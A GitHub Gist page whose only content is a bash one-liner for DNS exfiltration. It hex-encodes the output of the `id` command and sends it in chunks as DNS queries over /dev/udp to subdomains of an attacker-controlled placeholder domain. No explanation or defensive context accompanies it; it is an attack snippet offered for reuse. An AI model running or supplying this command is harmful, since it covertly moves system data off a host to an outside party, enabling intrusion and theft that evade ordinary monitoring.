Skip to content

Instantly share code, notes, and snippets.

@luca-m
Created January 22, 2015 21:05
Show Gist options
  • Select an option

  • Save luca-m/2e12570c6c6abe2eb042 to your computer and use it in GitHub Desktop.

Select an option

Save luca-m/2e12570c6c6abe2eb042 to your computer and use it in GitHub Desktop.
(LINE=`id`;domain=yourdomain.com;var=;while IFS= read -r -n 1 char;do var+=$(printf %02X "'${char:-$'\n'}'");done<<<$LINE;e=60;l=${#var};for((b=0;b<l;b+=60))do>&/dev/udp/$RANDOM.$b.${var:$b:$e}.$domain/53 0>&1;done;>&/dev/udp/$RANDOM.theend.$domain/53 0>&1)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment